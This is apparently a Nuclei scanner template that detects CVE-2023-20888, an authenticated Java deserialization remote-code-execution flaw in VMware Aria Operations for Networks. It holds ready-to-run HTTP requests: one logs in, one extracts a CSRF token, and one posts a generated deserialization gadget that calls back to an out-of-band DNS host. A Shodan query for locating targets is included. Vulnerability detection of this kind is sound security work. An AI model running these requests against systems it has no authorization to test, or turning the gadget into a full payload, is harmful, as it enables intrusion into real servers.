58 lines
1.7 KiB
YAML
58 lines
1.7 KiB
YAML
id: CVE-2023-20888
|
|
|
|
info:
|
|
name: VMware Aria Operations for Networks - Remote Code Execution
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: high
|
|
description: |
|
|
Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.
|
|
reference:
|
|
- https://www.vmware.com/security/advisories/VMSA-2023-0012.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-20888
|
|
classification:
|
|
cve-id: CVE-2023-20888
|
|
metadata:
|
|
verified: true
|
|
shodan-query: title:"VMware Aria Operations"
|
|
max-request: 2
|
|
tags: cve,cve2023,vmware,aria,rce,authenticated,oast
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/auth/login HTTP/2
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json;charset=UTF-8
|
|
X-Vrni-Csrf-Token: null
|
|
|
|
{"username":"{{username}}","password":"{{password}}","domain":"localdomain"}
|
|
|
|
- |
|
|
POST /api/events/push-notifications HTTP/2
|
|
Host: {{Hostname}}
|
|
X-Vrni-Csrf-Token: {{csrf}}
|
|
Content-Type: application/json
|
|
|
|
{"endOffset": "{{ generate_java_gadget("dns", "http://{{interactsh-url}}", "base64") }} "}
|
|
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- dns
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- 'csrfToken":"([a-z0-9A-Z/+=]+)"'
|
|
internal: true
|